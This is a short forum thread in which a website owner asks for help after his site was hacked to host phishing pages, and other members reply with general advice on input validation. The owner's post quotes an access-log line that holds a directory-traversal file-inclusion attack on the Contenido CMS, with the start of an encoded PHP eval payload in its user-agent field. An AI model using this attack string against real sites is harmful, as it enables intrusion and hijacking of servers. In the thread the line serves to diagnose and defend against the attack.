Linux.com

My site has been used for Phishing

Link to this post 09 Jan 12

Help please,

I have a website that someone has been able to hack and install phishing pages!

I need to set the security to make this impossible. Looking back in the logs I found this code snippet:

"GET /index.php?page=latestnews//conlib/prepend.php3?cfg[path][contenido]=../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 200 6578 "-" "<?eval(base64_decode('

After the page=latestnews there is a reference to conlib/prepend?cfg[path][contendido] which appears to install a page on the root directory from which they seem to be able to install phishing sites.

I have several sites on a dedicated FastHosts server but only 1 is being attacked?

Has anyone come across this and can recommend what to do?

Thanks

Mark

Link to this post 10 Jan 12

That looks like an sql injection...

parametrize your queries

Regards

Link to this post 10 Jan 12

Hi marc,

I've been through the database and it doesn't appear to be a sql injection.

More like an attack through Contenido CMS which we are not using but maybe installed as standard by FastHosts.

But, I can't find out how to disable this?

My main goal is to be able to tell FastHosts that the site cannot be attacked in this way again.

Thanks

Link to this post 10 Jan 12

Well, it's not an *sql* injection but it's an *injection* after all. You php code allows any paramter and the prove is :"../../../../../../../../../../../../.."

Your security problem is there ;)

Regards

Link to this post 11 Jan 12

1. Don't allow any input beyond specific formats.
2. For database I/O, DO NOT USE SQL in your forms - use stored procedures that do not take arguments as partial sql strings, but are only data passed in bound variables.
3. For all other input data, validate EVERYTHING.

It's not impossible to secure a web site from hacking, but it takes time and effort. If you don't want to invest in security, you will continue to be insecure.

Who we are ?

The Linux Foundation is a non-profit consortium dedicated to the growth of Linux.

More About the foundation...

Frequent Questions

Join / Linux Training / Board